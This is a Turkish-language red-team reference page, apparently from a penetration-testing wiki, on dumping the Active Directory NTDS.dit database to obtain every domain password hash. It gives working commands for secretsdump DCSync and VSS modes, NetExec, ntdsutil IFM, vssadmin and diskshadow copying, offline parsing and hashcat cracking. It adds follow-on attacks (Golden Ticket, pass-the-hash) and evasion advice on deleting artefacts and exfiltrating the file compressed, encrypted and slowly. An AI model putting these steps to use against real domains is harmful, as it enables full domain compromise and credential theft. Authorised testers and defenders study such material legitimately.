Skip to content

NTDS.dit Çıkarma

ATT&CK T1003.003 tüm domain hash'leri

ATT&CK T1003.003 tüm domain hash’leri

NTDS.dit, domain’deki tüm hesapların parola hash’lerini (ve nesne verisini) barındıran Active Directory veritabanıdır. Bir Domain Controller üzerinde yeterli yetkiyle bu veritabanı + SYSTEM hive (boot key) çıkarılırsa, tüm domain kimlikleri offline çözülür.

Pratikte çoğu angajmanda aynı sonuç DCSync ile ağ üzerinden alınır; NTDS yolu DC’de dosya erişimi / VSS gerektiğinde veya DRSUAPI kısıtlıysa kullanılır.

NTDS · secretsdump LOCAL

embedded tool
Generated command
impacket-secretsdump -ntds NTDS.dit -system SYSTEM LOCAL
  • DC’de admin eşdeğeri (DA, local admin on DC, veya Backup Operators + uygun teknik).
  • Diskte kilitli NTDS.dit → Volume Shadow Copy / ntdsutil IFM / diskshadow ile kopya.
  • Offline parse için SYSTEM hive (boot key).
  1. DCSync (uzaktan, dosyaya dokunmadan) — tercih edilen: Ayrıntı: DCSync .

    Terminal window
    impacket-secretsdump -just-dc domain.local/admin:'Pass'@DC
    Terminal window
    impacket-secretsdump -just-dc-ntlm domain.local/admin:'Pass'@DC
    Terminal window
    nxc smb DC -u admin -p 'Pass' --ntds
  2. ntdsutil IFM (Installation From Media) — temiz, desteklenen yol:

    ntdsutil
    activate instance ntds
    ifm
    create full C:\temp\ifm
    quit
    quit
  3. VSS / vssadmin / diskshadow :

    vssadmin create shadow /for=C:
    # Shadow yolunu not et, örn. \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\
    copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\temp\ntds.dit
    reg save HKLM\SYSTEM C:\temp\SYSTEM
    # diskshadow script (örnek)
    set context persistent nowriters
    add volume c: alias vss
    create
    expose %vss% z:
  4. impacket / NetExec uzaktan VSS :

    Terminal window
    impacket-secretsdump domain.local/admin:'Pass'@DC -use-vss
    Terminal window
    nxc smb DC -u admin -p 'Pass' --ntds vss
  5. Offline çöz :

    Terminal window
    impacket-secretsdump -ntds ntds.dit -system SYSTEM LOCAL
    Terminal window
    impacket-secretsdump -ntds ntds.dit -system SYSTEM LOCAL -outputfile domain
    Terminal window
    impacket-secretsdump -ntds ntds.dit -system SYSTEM LOCAL -history

Backup Operators üyesi SeBackup ile dosyaları ACL’ye bakmadan okuyabilir:

Terminal window

Bu grup sıkça “yüksek ama DA değil” yolu olarak BloodHound’da görünür.

krbtgt → Golden Ticket
Administrator → PtH
tüm NTLM → crack (hashcat -m 1000) / password reuse
machine accounts → Silver Ticket
Terminal window
hashcat -m 1000 ntlm.hashes rockyou.txt
  • IFM/VSS diskte büyük artefakt bırakır — iş bitince sil ( ntds.dit , shadow, IFM klasörü).
  • DCSync genelde daha az disk izi bırakır; VSS event’leri (VSSVC) belirgindir.
  • ntds.dit exfil boyutu büyük — sıkıştır, şifrele, yavaş kanal.
  • Production DC’de shadow create I/O spike yaratabilir — pencere seç.
  • Sadece ntds.dit alıp SYSTEM unutmak → boot key yok, parse fail.
  • Eski shadow yolu kopyalarken path escape ( \?\GLOBALROOT... ) hatası.
  • secretsdump LOCAL modunda dosya yolları yanlış cwd.
  • Esentutl / dirty shutdown → esentutl /p ntds.dit ile repair (lab).
  • RODC NTDS farklı secret seti içerir — RWDC tercih et.

DCSync · Golden Ticket · Pass-the-Hash · LSASS Dumping